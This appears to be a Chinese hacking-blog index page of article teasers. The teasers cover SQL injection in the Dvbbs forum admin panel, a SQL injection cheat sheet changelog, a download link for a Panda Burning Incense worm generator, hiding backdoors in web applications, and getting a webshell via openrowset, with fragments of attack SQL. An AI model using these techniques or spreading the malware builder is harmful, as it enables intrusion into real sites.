动网论坛(SQL版)后台注入方法
作者:肉丝
文章首发至NSP论坛
假如通过某些方式进了动网后台,但是管理员牺牲上传的功能把网站目录权限设置为禁止写入,或者说允许某些目录写入但是没有脚本执行权限,怎么办?大家都知道sql版好歹也可以差异备份,但是呢,注入点在那.前台?呵呵!我想不是大牛一般没人还能找到了吧.既然进了后台,大家就从后台找找看.
阅读全文 »
New Version of SQL Injection Cheat Sheet
来源:Ferruh Mavituna
鬼仔注:我原来发过一个SQL Injection Cheat Sheet
现在作者又进行了更新,下面是更新历史:
# 21/03/2007 – v1.2
* BENCHMARK() sample changed to avoid people DoS their MySQL Servers
* More Formatting and Typo
* Descriptions for some MySQL Function
# 30/03/2007 v1.3
* Niko pointed out PotsgreSQL and PHP supports stacked queries
* Bypassing 阅读全文 »
熊猫烧香生成器(感染下载者)
在h4x0r那里看到的
说是小米放到他群里的
然后我到小米的群共享里看了下
的确在里面放着
然后下了一份回来
据h4x0r说
这个东西里面可能有后门。
来源:H4x0r's Blog
下载地址:
WebDownLoader.rar
在WEB程序中隐藏后门
作者: 空虚浪子心
在很多商业程序中,程序员也许会出于某种目的,在程序中留下后门。我们不讨论这样做的目的是什么,只谈谈如何在程序中隐藏一个“终极后门”。首先给大家看一个例子,去年我写了一篇文章《对校园网的第二次安全检测,文中提到一个类似的后门:“…隐藏账户做后门!…如果不是我先拿到数据库,分析了一段时间以后才拿到程序,相信我也不会注意这个问题。某账户,在后台查询管理员账户的时候,他不出现,在管理员查询登陆和工作日志的时候,他自动消失…”。当时对JSP不了解,通过TOMCAT配置不正确漏洞下载了数据库,然后登陆后台,立刻就发现不对,知道有个后门,却不知道是什么原理,这次我们来把程序仔细“解剖”下。
在很多商业程序中,程序员也许会出于某种目的,在程序中留下后门。我们不讨论这样做的目的是什么,只谈谈如何在程序中隐藏一个“终极后门”。
阅读全文 »
渗透中用openrowset搞shell的方法
鬼仔注:老文章了,在xundi那里看到了,不知道作者是谁,但是看文章内容,貌似是疯狗写的。
得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.
联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%$@#$@^%$~
首先在自己机器建立SQL数据库
然后在对方机器上建立个表 create table [dbo].[fenggou]([cha8][char](255))–
在对方执行 DECLARE @result varchar(255) exec 阅读全文 »
Tags: openrowset, WebShell